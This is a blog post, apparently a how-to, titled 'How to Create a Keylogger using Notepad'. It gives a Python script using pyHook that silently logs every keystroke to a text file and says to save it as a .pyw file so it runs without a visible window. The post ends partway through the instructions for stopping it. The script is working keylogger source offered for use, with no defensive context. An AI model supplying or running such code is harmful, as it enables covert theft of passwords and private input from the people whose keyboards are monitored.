Skip to main content

Posts

Showing posts with the label Keylogger

How to Create a Keylogger using Notepad

Keylogger also called keystroke logging, are software programs or hardware devices that record keys struck on the computer keyboard of an individual computer user or network of computers.It almost records every keystroke that user typed and saved as a text file Keylogger Creation Just open the notepad and copy paste the script. import pyHook, pythoncom, sys, logging # feel free to set the file_log to a different file name/location  file_log = 'keyloggeroutput.txt'  def OnKeyboardEvent(event):  logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s') chr(event.Ascii)  logging.log(10,chr(event.Ascii))  return True  hooks_manager = pyHook.HookManager()  hooks_manager.KeyDown = OnKeyboardEvent  hooks_manager.HookKeyboard()  pythoncom.PumpMessages() 2. Now save it something filename.pyw and execute the keylogger file. When you need to quit logging, open up task manager and execute all...